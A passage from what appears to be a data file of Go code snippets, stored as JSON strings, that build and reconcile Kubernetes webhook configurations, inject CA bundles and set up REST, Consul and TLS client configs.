NewEndpointClient(\n\t\t\troute.URL,\n\t\t\troute.ForwardHeaders,\n\t\t\troute.Connect,\n\t\t\troute.EventTypes,\n\t\t\t&EndpointConfig{\n\t\t\t\tHTTPClient: &http.Client{\n\t\t\t\t\tCheckRedirect: func(req *http.Request, via []*http.Request) error {\n\t\t\t\t\t\treturn http.ErrUseLastResponse\n\t\t\t\t\t},\n\t\t\t\t\tTimeout: time.Duration(cfg.Timeout) * time.Second,\n\t\t\t\t\tTransport: &http.Transport{\n\t\t\t\t\t\tTLSClientConfig: &tls.Config{InsecureSkipVerify: cfg.SkipVerify},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tLog: p.cfg.Log,\n\t\t\t\tResponseHandler: EndpointResponseHandlerFunc(p.processEndpointResponse),\n\t\t\t\tOutCh: p.cfg.OutCh,\n\t\t\t},\n\t\t))\n\t}\n\n\treturn p, nil\n}", "func BuildWebhookConfigs(\n\twebhooks []*Webhook,\n\tc client.Client,\n\tnamespace, providerName string,\n\tservicePort int,\n\tmode, url string,\n\tcaBundle []byte,\n) (\n\tseedWebhookConfig client.Object,\n\tshootWebhookConfig *admissionregistrationv1.MutatingWebhookConfiguration,\n\terr error,\n) {\n\tvar (\n\t\texact = admissionregistrationv1.Exact\n\t\tsideEffects = admissionregistrationv1.SideEffectClassNone\n\n\t\tseedWebhooks []admissionregistrationv1.MutatingWebhook\n\t\tshootWebhooks []admissionregistrationv1.MutatingWebhook\n\t)\n\n\tfor _, webhook := range webhooks {\n\t\tvar rules []admissionregistrationv1.RuleWithOperations\n\n\t\tfor _, t := range webhook.Types {\n\t\t\trule, err := buildRule(c, t)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, nil, err\n\t\t\t}\n\t\t\trules = append(rules, *rule)\n\t\t}\n\n\t\twebhookToRegister := admissionregistrationv1.MutatingWebhook{\n\t\t\tAdmissionReviewVersions: []string{\"v1\", \"v1beta1\"},\n\t\t\tName: fmt.Sprintf(\"%s.%s.extensions.gardener.cloud\", webhook.Name, strings.TrimPrefix(providerName, \"provider-\")),\n\t\t\tNamespaceSelector: webhook.Selector,\n\t\t\tObjectSelector: webhook.ObjectSelector,\n\t\t\tRules: rules,\n\t\t\tSideEffects: &sideEffects,\n\t\t\tTimeoutSeconds: pointer.Int32(10),\n\t\t}\n\n\t\tif webhook.TimeoutSeconds != nil {\n\t\t\twebhookToRegister.TimeoutSeconds = webhook.TimeoutSeconds\n\t\t}\n\n\t\tshootMode := ModeURLWithServiceName\n\t\tif mode == ModeURL {\n\t\t\tshootMode = ModeURL\n\t\t}\n\n\t\tswitch webhook.Target {\n\t\tcase TargetSeed:\n\t\t\twebhookToRegister.FailurePolicy = getFailurePolicy(admissionregistrationv1.Fail, webhook.FailurePolicy)\n\t\t\twebhookToRegister.MatchPolicy = &exact\n\t\t\twebhookToRegister.ClientConfig = BuildClientConfigFor(webhook.Path, namespace, providerName, servicePort, mode, url, caBundle)\n\t\t\tseedWebhooks = append(seedWebhooks, webhookToRegister)\n\t\tcase TargetShoot:\n\t\t\twebhookToRegister.FailurePolicy = getFailurePolicy(admissionregistrationv1.Ignore, webhook.FailurePolicy)\n\t\t\twebhookToRegister.MatchPolicy = &exact\n\t\t\twebhookToRegister.ClientConfig = BuildClientConfigFor(webhook.Path, namespace, providerName, servicePort, shootMode, url, caBundle)\n\t\t\tshootWebhooks = append(shootWebhooks, webhookToRegister)\n\t\tdefault:\n\t\t\treturn nil, nil, fmt.Errorf(\"invalid webhook target: %s\", webhook.Target)\n\t\t}\n\t}\n\n\t// if all webhooks for one target are removed in a new version, extensions need to explicitly delete the respective\n\t// webhook config\n\tif len(seedWebhooks) > 0 {\n\t\tseedWebhookConfig = &admissionregistrationv1.MutatingWebhookConfiguration{\n\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\tName: NamePrefix + providerName,\n\t\t\t\tLabels: map[string]string{v1beta1constants.LabelExcludeWebhookFromRemediation: \"true\"},\n\t\t\t},\n\t\t\tWebhooks: seedWebhooks,\n\t\t}\n\t}\n\n\tif len(shootWebhooks) > 0 {\n\t\tshootWebhookConfig = &admissionregistrationv1.MutatingWebhookConfiguration{\n\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\tName: NamePrefix + providerName + NameSuffixShoot,\n\t\t\t\tLabels: map[string]string{v1beta1constants.LabelExcludeWebhookFromRemediation: \"true\"},\n\t\t\t},\n\t\t\tWebhooks: shootWebhooks,\n\t\t}\n\t}\n\n\treturn seedWebhookConfig, shootWebhookConfig, nil\n}", "func Convert_v1alpha1_WebhookClientConfig_To_auditregistration_WebhookClientConfig(in *v1alpha1.WebhookClientConfig, out *auditregistration.WebhookClientConfig, s conversion.Scope) error {\n\treturn autoConvert_v1alpha1_WebhookClientConfig_To_auditregistration_WebhookClientConfig(in, out, s)\n}", "func ConfigFromWebhookURL(webhookURL url.URL) (*Config, format.PropKeyResolver, error) {\n\tconfig, pkr := DefaultConfig()\n\n\tconfig.webhookURL = &webhookURL\n\t// TODO: Decide what to do with custom URL queries. Right now they are passed\n\t// to the inner url.URL and not processed by PKR.\n\t// customQuery, err := format.SetConfigPropsFromQuery(&pkr, webhookURL.Query())\n\t// goland:noinspection GoNilness: SetConfigPropsFromQuery always return non-nil\n\t// config.webhookURL.RawQuery = customQuery.Encode()\n\tconfig.DisableTLS = webhookURL.Scheme == \"http\"\n\treturn config, pkr, nil\n}", "func NewValidatingWebhookConfiguration(ctx *pulumi.Context,\n\tname string, args *ValidatingWebhookConfigurationArgs, opts ...pulumi.ResourceOption) (*ValidatingWebhookConfiguration, error) {\n\tif args == nil {\n\t\targs = &ValidatingWebhookConfigurationArgs{}\n\t}\n\targs.ApiVersion = pulumi.StringPtr(\"admissionregistration.k8s.io/v1\")\n\targs.Kind = pulumi.StringPtr(\"ValidatingWebhookConfiguration\")\n\taliases := pulumi.Aliases([]pulumi.Alias{\n\t\t{\n\t\t\tType: pulumi.String(\"kubernetes:admissionregistration.k8s.io/v1beta1:ValidatingWebhookConfiguration\"),\n\t\t},\n\t})\n\topts = append(opts, aliases)\n\tvar resource ValidatingWebhookConfiguration\n\terr := ctx.RegisterResource(\"kubernetes:admissionregistration.k8s.io/v1:ValidatingWebhookConfiguration\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (in *ClientConfig) DeepCopy() *ClientConfig {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(ClientConfig)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func WebhookWithOptions(o WebhookOptions) filters.Spec {\n\treturn &webhookSpec{options: o}\n}", "func NewWebhook(ops ...ConfigOption) (*Webhook, error) {\n\tconf := toConfig(ops...)\n\ttemplater, err := templates.NewTemplater(conf.templateName, conf.sidecarConfig, conf.sidecarTemplate)\n\tif err != nil {\n\t\topenlogging.Error(fmt.Sprintf(\"new templater failed: error = %v, template = %s\", err.Error(), conf.templateName))\n\t\treturn nil, err\n\t}\n\n\treturn &Webhook{\n\t\tserver: &http.Server{\n\t\t\tAddr: fmt.Sprintf(\":%d\", conf.port),\n\t\t\tTLSConfig: &tls.Config{GetCertificate: conf.getCertificate},\n\t\t},\n\t\tconfig: conf,\n\t\ttemplater: templater,\n\t}, nil\n}", "func (h *handler) clientConfig(kubeconfig []byte, contextName string) (*rest.Config, error) {\n\tif len(kubeconfig) > 0 {\n\t\tccfg, err := clientcmd.Load(kubeconfig)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif contextName != \"\" {\n\t\t\tccfg.CurrentContext = contextName\n\t\t}\n\t\terr = writeKubeconfig(kubeconfig, contextName, h.kubeConfigPath)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn clientcmd.NewDefaultClientConfig(*ccfg, &clientcmd.ConfigOverrides{}).ClientConfig()\n\t}\n\treturn rest.InClusterConfig()\n}", "func ConsulClientConfig(serverStrs, datacenter, token string) (client *api.Client, conf *api.Config, err error) {\r\n\tscStrs := strings.Split(strings.TrimSpace(serverStrs), \",\")\r\n\tif len(scStrs) < 1 {\r\n\t\terr = fmt.Errorf(\"noServerConfig\")\r\n\t\treturn\r\n\t}\r\n\tconf = api.DefaultConfig()\r\n\tconf.Datacenter = datacenter\r\n\tconf.Token = token\r\n\r\n\tfor _, sc := range scStrs {\r\n\t\tconf.Address = strings.TrimSpace(sc)\r\n\t\tclient, err = api.NewClient(conf)\r\n\t\tif err == nil {\r\n\t\t\treturn\r\n\t\t}\r\n\t}\r\n\terr = fmt.Errorf(\"noAvaiableServer\")\r\n\treturn\r\n}", "func WebsocketTLSClientConfig(tcc *tls.Config) optSetter {\n\treturn func(f *Forwarder) error {\n\t\tf.websocketDialer.TLSClientConfig = tcc.Clone()\n\t\t// WebSocket is only in http/1.1\n\t\tf.websocketDialer.TLSClientConfig.NextProtos = []string{\"http/1.1\"}\n\n\t\treturn nil\n\t}\n}", "func ReconcileSeedWebhookConfig(ctx context.Context, c client.Client, webhookConfig client.Object, ownerNamespace string, caBundle []byte) error {\n\tvar ownerReference *metav1.OwnerReference\n\tif len(ownerNamespace) > 0 {\n\t\tns := &corev1.Namespace{}\n\t\tif err := c.Get(ctx, client.ObjectKey{Name: ownerNamespace}, ns); err != nil {\n\t\t\treturn err\n\t\t}\n\t\townerReference = metav1.NewControllerRef(ns, corev1.SchemeGroupVersion.WithKind(\"Namespace\"))\n\t\townerReference.BlockOwnerDeletion = pointer.Bool(false)\n\t}\n\n\tdesiredWebhookConfig := webhookConfig.DeepCopyObject().(client.Object)\n\n\tif _, err := controllerutils.GetAndCreateOrStrategicMergePatch(ctx, c, webhookConfig, func() error {\n\t\tif ownerReference != nil {\n\t\t\twebhookConfig.SetOwnerReferences(kubernetes.MergeOwnerReferences(webhookConfig.GetOwnerReferences(), *ownerReference))\n\t\t}\n\n\t\tif len(caBundle) == 0 {\n\t\t\tvar err error\n\t\t\t// we can safely assume, that the CA bundles in all webhooks are the same, as we manage it ourselves\n\t\t\tcaBundle, err = GetCABundleFromWebhookConfig(webhookConfig)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\n\t\tif err := InjectCABundleIntoWebhookConfig(desiredWebhookConfig, caBundle); err != nil {\n\t\t\treturn err\n\t\t}\n\t\treturn OverwriteWebhooks(webhookConfig, desiredWebhookConfig)\n\t}); err != nil {\n\t\treturn fmt.Errorf(\"error reconciling seed webhook config: %w\", err)\n\t}\n\n\treturn nil\n}", "func LoadApiClientConfigFromOptions(options *KubectlOptions) (*restclient.Config, error) {\n\tlogger := logging.GetProjectLogger()\n\n\tvar server, token string\n\tvar caData []byte\n\n\tauthScheme := options.AuthScheme()\n\tswitch authScheme {\n\tcase ConfigBased:\n\t\tlogger.Infof(\"Using config on disk and context.\")\n\t\treturn LoadApiClientConfig(options.ConfigPath, options.ContextName)\n\t// for the other two methods, we need to extract the server cadata and token to construct the client config\n\tcase DirectAuth:\n\t\tlogger.Infof(\"Using direct auth methods to setup client.\")\n\t\tcaDataRaw, err := base64.StdEncoding.DecodeString(options.Base64PEMCertificateAuthority)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tcaData = caDataRaw\n\t\tserver = options.Server\n\t\ttoken = options.BearerToken\n\tcase EKSClusterBased:\n\t\tinfo, err := getKubeCredentialsFromEKSCluster(options.EKSClusterArn)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tcaDataRaw, err := base64.StdEncoding.DecodeString(info.Base64PEMCertificateAuthority)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tcaData = caDataRaw\n\t\tserver = info.Server\n\t\ttoken = info.BearerToken\n\tdefault:\n\t\t// This should never happen, but is required by the compiler\n\t\treturn nil, errors.WithStackTrace(AuthSchemeNotSupported{authScheme})\n\t}\n\n\tconfig := &restclient.Config{\n\t\tHost: server,\n\t\tBearerToken: token,\n\t\tContentConfig: restclient.ContentConfig{\n\t\t\tGroupVersion: &corev1.SchemeGroupVersion,\n\t\t\tNegotiatedSerializer: scheme.Codecs,\n\t\t},\n\t\tTLSClientConfig: restclient.TLSClientConfig{\n\t\t\tInsecure: false,\n\t\t\tCAData: caData,\n\t\t},\n\t}\n\treturn config, nil\n}", "func InjectCABundleIntoWebhookConfig(obj client.Object, caBundle []byte) error {\n\tswitch config := obj.(type) {\n\tcase *admissionregistrationv1.MutatingWebhookConfiguration:\n\t\tfor i, w := range config.Webhooks {\n\t\t\tw.ClientConfig.CABundle = caBundle\n\t\t\tconfig.Webhooks[i] = w\n\t\t}\n\tcase *admissionregistrationv1.ValidatingWebhookConfiguration:\n\t\tfor i, w := range config.Webhooks {\n\t\t\tw.ClientConfig.CABundle = caBundle\n\t\t\tconfig.Webhooks[i] = w\n\t\t}\n\tcase *admissionregistrationv1beta1.MutatingWebhookConfiguration:\n\t\tfor i, w := range config.Webhooks {\n\t\t\tw.ClientConfig.CABundle = caBundle\n\t\t\tconfig.Webhooks[i] = w\n\t\t}\n\tcase *admissionregistrationv1beta1.ValidatingWebhookConfiguration:\n\t\tfor i, w := range config.Webhooks {\n\t\t\tw.ClientConfig.CABundle = caBundle\n\t\t\tconfig.Webhooks[i] = w\n\t\t}\n\tdefault:\n\t\treturn fmt.Errorf(\"unexpected webhook config type: %T\", obj)\n\t}\n\n\treturn nil\n}", "func NewClient(config *Config) (client *Client, err error) {\n\t// bootstrap the config\n\tdefConfig := DefaultConfig()\n\n\tif len(config.ApiAddress) == 0 {\n\t\tconfig.ApiAddress = defConfig.ApiAddress\n\t}\n\n\tif len(config.Username) == 0 {\n\t\tconfig.Username = defConfig.Username\n\t}\n\n\tif len(config.Password) == 0 {\n\t\tconfig.Password = defConfig.Password\n\t}\n\n\tif len(config.Token) == 0 {\n\t\tconfig.Token = defConfig.Token\n\t}\n\n\tif len(config.UserAgent) == 0 {\n\t\tconfig.UserAgent = defConfig.UserAgent\n\t}\n\n\tif config.HttpClient == nil {\n\t\tconfig.HttpClient = defConfig.HttpClient\n\t}\n\n\tif config.HttpClient.Transport == nil {\n\t\tconfig.HttpClient.Transport = shallowDefaultTransport()\n\t}\n\n\tvar tp *http.Transport\n\n\tswitch t := config.HttpClient.Transport.(type) {\n\tcase *http.Transport:\n\t\ttp = t\n\tcase *oauth2.Transport:\n\t\tif bt, ok := t.Base.(*http.Transport); ok {\n\t\t\ttp = bt\n\t\t}\n\t}\n\n\tif tp != nil {\n\t\tif tp.TLSClientConfig == nil {\n\t\t\ttp.TLSClientConfig = &tls.Config{}\n\t\t}\n\t\ttp.TLSClientConfig.InsecureSkipVerify = config.SkipSslValidation\n\t}\n\n\tconfig.ApiAddress = strings.TrimRight(config.ApiAddress, \"/\")\n\n\tclient = &Client{\n\t\tConfig: *config,\n\t}\n\n\tif err := client.refreshEndpoint(); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn client, nil\n}", "func (cc *Client) WithClientConfig(ctx context.Context, req *http.Request) *http.Request {\n\ttrace := cc.HTTPTrace()\n\tif trace != nil && trace.ClientTrace != nil {\n\t\treturn req.WithContext(httptrace.WithClientTrace(ctx, trace.ClientTrace))\n\t}\n\treturn req.WithContext(ctx)\n}", "func createValidatingWebhookConfiguration(f *framework.Framework, config *admissionregistrationv1.ValidatingWebhookConfiguration) (*admissionregistrationv1.ValidatingWebhookConfiguration, error) {\n\tctx := f.Context\n\tfor _, webhook := range config.Webhooks {\n\t\tif webhook.NamespaceSelector != nil && webhook.NamespaceSelector.MatchLabels[uniqueName] == \"true\" {\n\t\t\tcontinue\n\t\t}\n\t\tif webhook.ObjectSelector != nil && webhook.ObjectSelector.MatchLabels[uniqueName] == \"true\" {\n\t\t\tcontinue\n\t\t}\n\t\tf.Log.Failf(`webhook %s in config %s has no namespace or object selector with %s=\"true\", and can interfere with other tests`, webhook.Name, config.Name, uniqueName)\n\t}\n\treturn f.VclusterClient.AdmissionregistrationV1().ValidatingWebhookConfigurations().Create(ctx, config, metav1.CreateOptions{})\n}", "func (c WebhooksConfig) NewWebhooks(ctx context.Context, server io.Server) (web.Webhooks, error) {\n\tvar target web.Sink\n\tswitch c.Target {\n\tcase \"\":\n\t\treturn nil, nil\n\tcase \"direct\":\n\t\tclient, err := server.HTTPClient(ctx)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tclient.Timeout = c.Timeout\n\t\ttarget = &web.HTTPClientSink{\n\t\t\tClient: client,\n\t\t}\n\tdefault:\n\t\treturn nil, errWebhooksTarget.WithAttributes(\"target\", c.Target)\n\t}\n\tif c.Registry == nil {\n\t\treturn nil, errWebhooksRegistry.New()\n\t}\n\tif c.QueueSize > 0 || c.Workers > 0 {\n\t\ttarget = &web.QueuedSink{\n\t\t\tTarget: target,\n\t\t\tQueue: make(chan *http.Request, c.QueueSize),\n\t\t\tWorkers: c.Workers,\n\t\t}\n\t}\n\tif controllable, ok := target.(web.ControllableSink); ok {\n\t\tgo func() {\n\t\t\tif err := controllable.Run(ctx); err != nil && !errors.IsCanceled(err) {\n\t\t\t\tlog.FromContext(ctx).WithError(err).Error(\"Webhooks target sink failed\")\n\t\t\t}\n\t\t}()\n\t}\n\treturn web.NewWebhooks(ctx, server, c.Registry, target, c.Downlinks)\n}", "func NewGenericWebhook(kubeConfigFile string, groupVersions []unversioned.GroupVersion) (*GenericWebhook, error) {\n\tfor _, groupVersion := range groupVersions {\n\t\tif !registered.IsEnabledVersion(groupVersion) {\n\t\t\treturn nil, fmt.Errorf(\"webhook plugin requires enabling extension resource: %s\", groupVersion)\n\t\t}\n\t}\n\n\tloadingRules := clientcmd.NewDefaultClientConfigLoadingRules()\n\tloadingRules.ExplicitPath = kubeConfigFile\n\tloader := clientcmd.NewNonInteractiveDeferredLoadingClientConfig(loadingRules, &clientcmd.ConfigOverrides{})\n\n\tclientConfig, err := loader.ClientConfig()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcodec := api.Codecs.LegacyCodec(groupVersions...)\n\tclientConfig.ContentConfig.NegotiatedSerializer = runtimeserializer.NegotiatedSerializerWrapper(\n\t\truntime.SerializerInfo{Serializer: codec},\n\t\truntime.StreamSerializerInfo{},\n\t)\n\n\trestClient, err := restclient.UnversionedRESTClientFor(clientConfig)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// TODO(ericchiang): Can we ensure remote service is reachable?\n\n\treturn &GenericWebhook{restClient}, nil\n}", "func NewForConfig(config clientcmd.ClientConfig) (client *Client, err error) {\n\tif config == nil {\n\t\t// initialize client-go clients\n\t\tloadingRules := clientcmd.NewDefaultClientConfigLoadingRules()\n\t\tconfigOverrides := &clientcmd.ConfigOverrides{}\n\t\tconfig = clientcmd.NewNonInteractiveDeferredLoadingClientConfig(loadingRules, configOverrides)\n\t}\n\n\tclient = new(Client)\n\tclient.KubeConfig = config\n\n\tclient.KubeClientConfig, err = client.KubeConfig.ClientConfig()\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, errorMsg)\n\t}\n\n\tclient.KubeClient, err = kubernetes.NewForConfig(client.KubeClientConfig)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient.Namespace, _, err = client.KubeConfig.Namespace()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient.OperatorClient, err = operatorsclientset.NewForConfig(client.KubeClientConfig)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient.DynamicClient, err = dynamic.NewForConfig(client.KubeClientConfig)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient.appsClient, err = appsclientset.NewForConfig(client.KubeClientConfig)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient.serviceCatalogClient, err = servicecatalogclienset.NewForConfig(client.KubeClientConfig)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient.discoveryClient, err = discovery.NewDiscoveryClientForConfig(client.KubeClientConfig)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient.checkIngressSupports = true\n\n\tclient.userClient, err = userclientset.NewForConfig(client.KubeClientConfig)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient.projectClient, err = projectclientset.NewForConfig(client.KubeClientConfig)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient.routeClient, err = routeclientset.NewForConfig(client.KubeClientConfig)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn client, nil\n}", "func (cm *CertificateManager) updateWebhookConfigs(ctx context.Context, caCertData []byte) error {\n\tcm.opts.Logger.Info(\"Updating webhook configs with CA bundle\")\n\n\t// Update validating webhooks with new CA data.\n\tlabelSelector, err := metav1.ParseToLabelSelector(cm.opts.WebhookConfigLabel)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to parse webhook label: %w\", err)\n\t}\n\tmatchLabels := client.MatchingLabels(labelSelector.MatchLabels)\n\tvalidatingWebhookList := &adminregv1.ValidatingWebhookConfigurationList{}\n\tif err := cm.opts.Client.List(ctx, validatingWebhookList, matchLabels); err != nil && !apierrors.IsNotFound(err) {\n\t\treturn fmt.Errorf(\"failed to list validating webhooks: %w\", err)\n\t}\n\n\tfor i := range validatingWebhookList.Items {\n\t\twebhookConfig := validatingWebhookList.Items[i]\n\t\tfor i := range webhookConfig.Webhooks {\n\t\t\twebhookConfig.Webhooks[i].ClientConfig.CABundle = caCertData\n\t\t}\n\n\t\tif err := cm.opts.Client.Update(ctx, &webhookConfig); err != nil {\n\t\t\tif !apierrors.IsConflict(err) {\n\t\t\t\treturn fmt.Errorf(\"failed to update validating webhook configuration %s/%s: %w\", webhookConfig.Namespace, webhookConfig.Name, err)\n\t\t\t}\n\t\t}\n\t}\n\n\t// Update mutating webhooks with new CA data.\n\tmutatingWebhookList := &adminregv1.MutatingWebhookConfigurationList{}\n\tif err := cm.opts.Client.List(ctx, mutatingWebhookList, matchLabels); err != nil && !apierrors.IsNotFound(err) {\n\t\treturn fmt.Errorf(\"failed to list mutating webhooks: %w\", err)\n\t}\n\n\tfor i := range mutatingWebhookList.Items {\n\t\twebhookConfig := mutatingWebhookList.Items[i]\n\t\tfor i := range webhookConfig.Webhooks {\n\t\t\twebhookConfig.Webhooks[i].ClientConfig.CABundle = caCertData\n\t\t}\n\n\t\tif err := cm.opts.Client.Update(ctx, &webhookConfig); err != nil {\n\t\t\tif !apierrors.IsConflict(err) {\n\t\t\t\treturn fmt.Errorf(\"failed to update mutating webhook configuration %s/%s: %w\", webhookConfig.Namespace, webhookConfig.Name, err)\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func clientConfig(m discovery.PluginMeta, loglevel hclog.Level) *goPlugin.ClientConfig {\n\tlogger := hclog.New(&hclog.LoggerOptions{\n\t\tName: \"plugin\",\n\t\tLevel: loglevel,\n\t\tOutput: os.Stderr,\n\t})\n\n\treturn &goPlugin.ClientConfig{\n\t\tCmd: exec.Command(m.Path), //nolint:gosec\n\t\tHandshakeConfig: plugin.Handshake,\n\t\tVersionedPlugins: plugin.VersionedPlugins,\n\t\tManaged: true,\n\t\tLogger: logger,\n\t\tAllowedProtocols: []goPlugin.Protocol{goPlugin.ProtocolGRPC},\n\t\tAutoMTLS: true,\n\t}\n}", "func NewForConfigAndClient(c *rest.Config, h *http.Client) (*ConfigV1Client, error) {\n\tconfig := *c\n\tif err := setConfigDefaults(&config); err != nil {\n\t\treturn nil, err\n\t}\n\tclient, err := rest.RESTClientForConfigAndClient(&config, h)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &ConfigV1Client{client}, nil\n}", "func New(\n\tctx context.Context,\n\tcontrollers []interface{},\n) (webhook *Webhook, err error) {\n\n\t// ServeMux.Handle panics on duplicate paths\n\tdefer func() {\n\t\tif r := recover(); r != nil {\n\t\t\terr = fmt.Errorf(\"error creating webhook %v\", r)\n\t\t}\n\t}()\n\n\topts := GetOptions(ctx)\n\tif opts == nil {\n\t\treturn nil, errors.New(\"context must have Options specified\")\n\t}\n\tlogger := logging.FromContext(ctx)\n\n\tif opts.StatsReporter == nil {\n\t\treporter, err := NewStatsReporter()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\topts.StatsReporter = reporter\n\t}\n\n\tdefaultTLSMinVersion := uint16(tls.VersionTLS13)\n\tif opts.TLSMinVersion == 0 {\n\t\topts.TLSMinVersion = TLSMinVersionFromEnv(defaultTLSMinVersion)\n\t} else if opts.TLSMinVersion != tls.VersionTLS12 && opts.TLSMinVersion != tls.VersionTLS13 {\n\t\treturn nil, fmt.Errorf(\"unsupported TLS version: %d\", opts.TLSMinVersion)\n\t}\n\n\tsyncCtx, cancel := context.WithCancel(context.Background())\n\n\twebhook = &Webhook{\n\t\tOptions: *opts,\n\t\tLogger: logger,\n\t\tsynced: cancel,\n\t}\n\n\tif opts.SecretName != \"\" {\n\t\t// Injection is too aggressive for this case because by simply linking this\n\t\t// library we force consumers to have secret access. If we require that one\n\t\t// of the admission controllers' informers *also* require the secret\n\t\t// informer, then we can fetch the shared informer factory here and produce\n\t\t// a new secret informer from it.\n\t\tsecretInformer := kubeinformerfactory.Get(ctx).Core().V1().Secrets()\n\n\t\twebhook.tlsConfig = &tls.Config{\n\t\t\tMinVersion: opts.TLSMinVersion,\n\n\t\t\t// If we return (nil, error) the client sees - 'tls: internal error\"\n\t\t\t// If we return (nil, nil) the client sees - 'tls: no certificates configured'\n\t\t\t//\n\t\t\t// We'll return (nil, nil) when we don't find a certificate\n\t\t\tGetCertificate: func(*tls.ClientHelloInfo) (*tls.Certificate, error) {\n\t\t\t\tsecret, err := secretInformer.Lister().Secrets(system.Namespace()).Get(opts.SecretName)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlogger.Errorw(\"failed to fetch secret\", zap.Error(err))\n\t\t\t\t\treturn nil, nil\n\t\t\t\t}\n\t\t\t\twebOpts := GetOptions(ctx)\n\t\t\t\tsKey, sCert := getSecretDataKeyNamesOrDefault(webOpts.ServerPrivateKeyName, webOpts.ServerCertificateName)\n\t\t\t\tserverKey, ok := secret.Data[sKey]\n\t\t\t\tif !ok {\n\t\t\t\t\tlogger.Warn(\"server key missing\")\n\t\t\t\t\treturn nil, nil\n\t\t\t\t}\n\t\t\t\tserverCert, ok := secret.Data[sCert]\n\t\t\t\tif !ok {\n\t\t\t\t\tlogger.Warn(\"server cert missing\")\n\t\t\t\t\treturn nil, nil\n\t\t\t\t}\n\t\t\t\tcert, err := tls.X509KeyPair(serverCert, serverKey)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\t\t\t\treturn &cert, nil\n\t\t\t},\n\t\t}\n\t}\n\n\twebhook.mux.HandleFunc(\"/\", func(w http.ResponseWriter, r *http.Request) {\n\t\thttp.Error(w, fmt.Sprint(\"no controller registered for: \", html.EscapeString(r.URL.Path)), http.StatusBadRequest)\n\t})\n\n\tfor _, controller := range controllers {\n\t\tswitch c := controller.(type) {\n\t\tcase AdmissionController:\n\t\t\thandler := admissionHandler(logger, opts.StatsReporter, c, syncCtx.Done())\n\t\t\twebhook.mux.Handle(c.Path(), handler)\n\n\t\tcase ConversionController:\n\t\t\thandler := conversionHandler(logger, opts.StatsReporter, c)\n\t\t\twebhook.mux.Handle(c.Path(), handler)\n\n\t\tdefault:\n\t\t\treturn nil, fmt.Errorf(\"unknown webhook controller type: %T\", controller)\n\t\t}\n\t}\n\n\treturn\n}", "func GetClientConfig(kubeConfig string) (*rest.Config, error) {\n\tif kubeConfig != \"\" {\n\t\treturn clientcmd.BuildConfigFromFlags(\"\", kubeConfig)\n\t}\n\treturn rest.InClusterConfig()\n\n}", "func ValidatingWebhookConfigurationCreator(timeout int) reconciling.NamedValidatingWebhookConfigurationCreatorGetter {\n\treturn func() (string, reconciling.ValidatingWebhookConfigurationCreator) {\n\t\treturn resources.GatekeeperValidatingWebhookConfigurationName, func(validatingWebhookConfigurationWebhookConfiguration *admissionregistrationv1.ValidatingWebhookConfiguration) (*admissionregistrationv1.ValidatingWebhookConfiguration, error) {\n\t\t\tfailurePolicyIgnore := admissionregistrationv1.Ignore\n\t\t\tsideEffectsNone := admissionregistrationv1.SideEffectClassNone\n\t\t\tmatchPolicyExact := admissionregistrationv1.Exact\n\t\t\tallScopes := admissionregistrationv1.AllScopes\n\n\t\t\tvalidatingWebhookConfigurationWebhookConfiguration.Labels = map[string]string{\"gatekeeper.sh/system\": \"yes\"}\n\t\t\t// Get cabundle if set\n\t\t\tvar caBundle []byte\n\t\t\tif len(validatingWebhookConfigurationWebhookConfiguration.Webhooks) > 0 {\n\t\t\t\tcaBundle = validatingWebhookConfigurationWebhookConfiguration.Webhooks[0].ClientConfig.CABundle\n\t\t\t}\n\t\t\tvalidatingWebhookConfigurationWebhookConfiguration.Webhooks = []admissionregistrationv1.ValidatingWebhook{\n\t\t\t\t{\n\t\t\t\t\tName: \"validation.gatekeeper.sh\",\n\t\t\t\t\tAdmissionReviewVersions: []string{admissionregistrationv1.SchemeGroupVersion.Version, admissionregistrationv1beta1.SchemeGroupVersion.Version},\n\t\t\t\t\tFailurePolicy: &failurePolicyIgnore,\n\t\t\t\t\tSideEffects: &sideEffectsNone,\n\t\t\t\t\tTimeoutSeconds: pointer.Int32Ptr(int32(timeout)),\n\t\t\t\t\tMatchPolicy: &matchPolicyExact,\n\t\t\t\t\tNamespaceSelector: &metav1.LabelSelector{\n\t\t\t\t\t\tMatchExpressions: []metav1.LabelSelectorRequirement{\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tKey: \"control-plane\",\n\t\t\t\t\t\t\t\tOperator: 